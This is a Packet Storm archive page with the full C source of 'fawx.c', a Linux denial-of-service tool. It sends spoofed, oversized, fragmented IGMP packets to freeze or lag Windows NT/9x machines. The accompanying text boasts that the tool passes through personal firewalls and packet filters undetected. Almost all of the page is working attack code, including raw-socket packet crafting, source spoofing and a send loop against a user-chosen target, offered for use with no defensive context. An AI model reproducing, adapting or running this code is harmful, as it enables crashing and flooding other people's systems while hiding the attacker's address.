fawx.c is an igmp-8+frag attack for linux, similar to ssping.c, that sends oversized fragmented IGMP packets to a box either making it freeze (WinNT/9x), or lagging it to hell and back. Since most Win32 firewalls dont support IGMP, the attack successfully penetrates most systems, making it much more effective than an ICMP attack which is likely to be filtered. It has successfully crashed NT4.0+sp1+2, Win95, Win95 with ConSeal PC firewall blocking icmp, Win95 with McAfee PC firewall. It also passed undetected through ipfwadm and ipchains (useful for flooding).
3bceefae0c99f8589c025cb707a2813f18fb5385a697fd53eb3a30be6fce1021/* fawx.c v1 by ben-z -- igmp-8+frag attack for linux *
* thanks to datagram for ssping.c - helped lots *
* -------------------------------------------------- *
* DESCRIPTION: *
* Sends oversized fragmented IGMP packets to a box *
* either making it freeze (WinNT/9x), or lagging *
* it to hell and back. Since most win32 firewalls *
* dont support IGMP, the attack successfully *
* penetrates into the system, making it much more *
* effective than an ICMP attack which is likely to *
* be filtered. *
* GREETINGS: *
* mad props to datagram for writing ssping, also *
* thanks to #fts(2) on undernet and the psychic *
* crew on efnet. shouts to ka0z, cyrus, magicfx, *
* ice-e, zeronine, soupnazi, benito, eklipz, c0s, *
* metalman, chawp, folk, atomic-, dethwish, sindawg *
* mosthated, and everyone on irc.slacknet.org.. */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>
void banner(void) {
printf(" -----------------------------------------------\n");
printf("| fawx v1 by ben-z: igmp-8+frag spoofing attack |\n");
printf(" -----------------------------------------------\n");
}
void usage(const char *progname) {
printf("[**] syntax: %s <spoof host> <target host> <number>\n",progname);
}
int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"\nuhm.. %s doesnt exist :P\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
int send_fawx(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct igmphdr *igmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct igmphdr) + 8);
ip = (struct iphdr *)packet;
igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
ip->id = htons(34717);
ip->frag_off |= htons(0x2000);
ip->ttl = 255;
ip->protocol = IPPROTO_IGMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 8;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2000);
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 0;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
/* printf("."); <- it looked way too ugly :P */
return(0);
}
int main(int argc, char * *argv) {
struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
if ((argc != 4)) {
usage(argv[0]);
return(-1);
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"error opening raw socket. <got root?>\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("[**] sending igmp-8+frag attacks to: %s.",argv[2]);
for (i = 0;i < atoi(argv[3]);i++) {
if (send_fawx(sock,
src_addr,
&dest_addr) == -1) {
fprintf(stderr,"error sending packet. <got root?>\n");
return(-1);
}
usleep(10000);
}
printf(" *eof*\n");
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed